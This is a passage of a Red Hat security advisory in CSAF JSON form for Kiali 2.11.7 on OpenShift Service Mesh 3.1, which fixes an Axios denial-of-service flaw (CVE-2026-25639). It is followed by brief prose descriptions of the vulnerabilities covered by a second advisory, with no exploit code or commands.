"text": "Kiali 2.11.7, for Red Hat OpenShift Service Mesh 3.1, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.\n\nSecurity Fix(es):\n\n* kiali-ossmc-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n\n* kiali-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3105",
"url": "https://access.redhat.com/errata/RHSA-2026:3105"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-25639",
"url": "https://access.redhat.com/security/cve/cve-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3105.json"
}
],
"title": "Red Hat Security Advisory: Kiali 2.11.7 for Red Hat OpenShift Service Mesh 3.1",
"tracking": {
"current_release_date": "2026-04-16T10:28:08+00:00",
"generator": {
"date": "2026-04-16T10:28:08+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3105",
"initial_release_date": "2026-02-23T17:14:20+00:00",
"revision_history": [
{
"date": "2026-02-23T17:14:20+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T17:14:25+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:28:08+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 3.1",
"product": {
"name": "Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:3.1::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3Ae044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385160"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372942"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385160"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372942"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3Acda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385160"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3Ab180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372942"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385160"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372942"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64 as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64 as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64 as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64 as a component of Red Hat OpenShift Service Mesh 3.1",
"product_id": "Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T17:14:20+00:00",
"details": "See Kiali 2.11.7 documentation at https://docs.redhat.com/en/documentation/red_hat_openshift_service_mesh/3.1/html/observability/kiali-operator-provided-by-red-hat",
"product_ids": [
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3105"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3a12696cddcbd01b02ae332b4f73316808680c5bfa56e3597817e997f8355ba7_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:61a42cd27a26463b5ad014ad66b35e69b37c3d58fcaa2f5155dadee1e605e4bc_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:7d9cc9e8c8323cfd63825308ed3c2dce098ddefaae34c173adb3015ffe70e818_amd64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:b180e0fcda8131effc98d2a032400362e60a9cc34f49fb72528bab279865bfc1_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:11766a5adbc2780b7620d69cf14cfda2d44bf27ecd5e56696e97491c0152f4af_arm64",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:8af3bb4095fbc3fbf144e27cc7cd77dc37fa018f72fd6b4fbaa0280cc468b93a_s390x",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:cda057051d2354ac54f49cacc382bb8ef05ae198543a6f996b9c9b85abc97d65_ppc64le",
"Red Hat OpenShift Service Mesh 3.1:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:e044ac52590a4e4747b264c066d56beb2a8360051fecd3880d5b806b069c2d35_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:6192
Vulnerability from csaf_redhat - Published: 2026-03-30 15:41 - Updated: 2026-04-16 11:09A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in Traefik's plugin installation mechanism. This vulnerability allows remote code execution, privilege escalation, persistence, or application-level denial of service via a crafted ZIP archive exploiting a path traversal vector.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in glob. This vulnerability allows arbitrary command execution via processing files with malicious names when the glob command-line interface (CLI) is used with the -c/--cmd option, enabling shell metacharacters to trigger command injection.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in Vert.x. The Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URIs, preventing legitimate users from accessing static files with an HTTP 404 response.
A flaw was found in Traefik, an HTTP reverse proxy and load balancer. This vulnerability exists in the ACME TLS-ALPN fast path, where unauthenticated clients can exploit it. By initiating numerous connections and sending a minimal ClientHello with "acme-tls/1" before ceasing communication, a malicious client can indefinitely tie up system resources such as "go routines" (lightweight threads) and file descriptors. This leads to a Denial of Service (DoS) of the entry point, making the service unavailable to legitimate users.
A flaw was found in the node-tar library. This vulnerability allows an attacker to craft malicious archives that, when extracted, can bypass intended security restrictions. This leads to arbitrary file overwrite and symlink poisoning, potentially allowing unauthorized modification of files on the system.
A flaw was found in node-tar, a library for Node.js. This race condition vulnerability occurs due to incomplete handling of Unicode path collisions within the `path-reservations` system on case-insensitive filesystems, such as macOS APFS. A remote attacker can exploit this by providing a specially crafted tar archive containing filenames that cause these collisions, bypassing internal concurrency safeguards. Successful exploitation can lead to arbitrary file overwrite.
A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.
A flaw was found in node-tar, a Node.js module for handling TAR archives. This vulnerability allows a remote attacker to bypass path traversal protections by crafting a malicious TAR archive. The security check for hardlink entries uses different path resolution logic than the actual hardlink creation, enabling the attacker to create hardlinks to arbitrary files outside the intended extraction directory. This could lead to unauthorized information disclosure or further system compromise.
A flaw was found in Fastify, a web framework for Node.js. A remote attacker can exploit a validation bypass vulnerability by appending a tab character followed by arbitrary content to the Content-Type header. This circumvents the request body validation schemas, allowing the server to process the body as the original content type without proper validation. This could lead to unexpected data processing and potential integrity impact.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
